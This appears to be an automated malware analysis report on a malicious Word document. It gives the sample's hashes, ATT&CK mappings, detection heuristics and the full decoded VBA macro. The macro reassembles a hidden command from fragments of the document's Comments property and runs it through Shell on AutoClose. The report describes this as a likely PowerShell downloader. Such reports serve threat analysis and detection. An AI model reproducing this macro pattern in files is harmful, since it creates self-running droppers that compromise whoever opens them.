Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6bc886da84b4f26…

MALICIOUS

Office (OLE)

93.5 KB Created: 2017-10-09 11:08:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: f2c1ae55f4592e1905c39222f51f1310 SHA-1: 102cc9ebacb99c17b2d5e7c322f0e66c08b2f0b0 SHA-256: f6bc886da84b4f26ec2dc326b84bbf10b511d3236c0a50b0305ffcc139fd09bb
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the use of the Shell() function within the VBA code, which is further supported by a high-severity heuristic for PowerShell references and an AutoClose macro execution. This suggests the macro is designed to execute a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection also confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Dropper.HeuristicShellOnClose-6370606-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HeuristicShellOnClose-6370606-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    EQzdr = XYESUiECDnb + iiNBKTBqq + imjUSk + XRDDcZR + HNRUmSG + bqYthhvGqw + kDWiGSfal + MijdrqsTdt + OrikVI + VmlXJvlfz + FwwMK
VBA.Shell$ EQzdr, 0
End Sub
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    End Sub
Sub AutoClose()
XujqfnKhR
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6366 bytes
SHA-256: 7cd97b07fab025f8fedb30161013e68778c75c9a98217c6d7eac8a614bcdde33
Detection
ClamAV: No threats found
Obfuscation or payload: likely
44 of 77 identifiers look randomly generated (e.g. 'VQPkvkdTzhR') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub XujqfnKhR()
LfzpkJi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4506, 36)
iTNzXlIIih = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9272, 127)
tWLYfjfPdE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5119, 100)
ljWBKhLtAu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 353, 65)
VQPkvkdTzhR = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7227, 174)
REdDzJZpVO = LfzpkJi + iTNzXlIIih + tWLYfjfPdE + ljWBKhLtAu + VQPkvkdTzhR
wBWkm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16486, 73)
RCOQuU = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15598, 168)
KuEOMPtc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16849, 159)
DkiFzCYVom = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5928, 55)
MuSvUOpMIdQ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17110, 74)
bJcBrFYou = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10833, 146)
jLCLrZf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14645, 198)
NhJwRuimUha = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12998, 130)
bYtwTzjDJ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8045, 144)
CPJMiV = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5665, 182)
JzRtzfkwamT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 723, 199)
vwkiSu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9164, 18)
awEQwtClS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18362, 176)
wcJjJitRjAF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13979, 161)
ECGSZiLacO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2124, 38)
NdAmh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1487, 195)
dUOjmN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4022, 17)
YdWhUfOMwmk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11209, 54)
wYVNZjwBs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17532, 167)
pwmVp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2927, 132)
FzimzGj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8292, 142)
wREzzzZj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11964, 115)
SMjdwjwVsXs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15859, 117)
bSfMBKbP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11154, 17)
IzjofE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17851, 199)
FawCHYVk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6038, 167)
lorfGudjRmX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6481, 163)
dlCYjOr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14854, 89)
CAmSZYL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3132, 112)
RDcisScrpL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8710, 109)
DzjFTREzpV = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13159, 4)
UlrsnUEUK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8977, 114)
Srztj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15455, 91)
ZjTiwADNGH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17224, 191)
CvowJG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3793, 168)
DUGibIsQN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5338, 61)
UEAwjMqm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7623, 6)
aNzNDsLivp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 562, 46)
LkEZoC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12131, 76)
mzmjl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13638, 157)
zFjTT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11567, 109)
dGJQYPhlSil = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12418, 119)
PrJYowjCabO = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3582, 180)
qLYMWSXQHzP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 87, 125)
aZAhHzZK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1763, 57)
vLiXAs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2674, 32)
voZYWNFIS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16, 10)
IutALVKB = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2246, 199)
QCpEDdA = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9609, 35)
XYESUiECDnb = REdDzJZpVO + wBWkm + RCOQuU + KuEOMPtc + DkiFzCYVom + MuSvUOpMIdQ + bJcBrFYou + jLCLrZf + NhJwRuimUha + bYtwTzjDJ + CPJMiV + JzRtzfkwamT + vwkiSu + awEQwtClS + wcJjJitRjAF + ECGSZiLacO + NdAmh + dUOjmN + YdWhUfOMwmk + wYVNZjwBs + pwmVp + FzimzGj + wREzzzZj + SMjdwjwVsXs + bSfMBKbP + IzjofE + FawCHYVk + lorfGudjRmX + dlCYjOr + CAmSZYL + RDcisScrpL + DzjFTREzpV + UlrsnUEUK + Srztj + ZjTiwADNGH + CvowJG + DUGibIsQN + UEAwjMqm + aNzNDsLivp + LkEZoC + mzmjl + zFjTT + dGJQYPhlSil + PrJYowjCabO + qLYMWSXQHzP + aZAhHzZK + vLiXAs + voZYWNFIS + IutALVKB + QCpEDdA
iiNBKTBqq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9517, 29)
imjUSk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6799, 1)
XRDDcZR = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6831, 19)
HNRUmSG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6269, 64)
bqYthhvGqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9993, 24)
kDWiGSfal = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11910, 52)
MijdrqsTdt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5252, 13)
OrikVI = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5861, 4)
VmlXJvlfz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7580, 1)
FwwMK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16224, 1)
EQzdr = XYESUiECDnb + iiNBKTBqq + imjUSk + XRDDcZR + HNRUmSG + bqYthhvGqw + kDWiGSfal + MijdrqsTdt + OrikVI + VmlXJvlfz + FwwMK
VBA.Shell$ EQzdr, 0
End Sub
Sub AutoClose()
XujqfnKhR
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.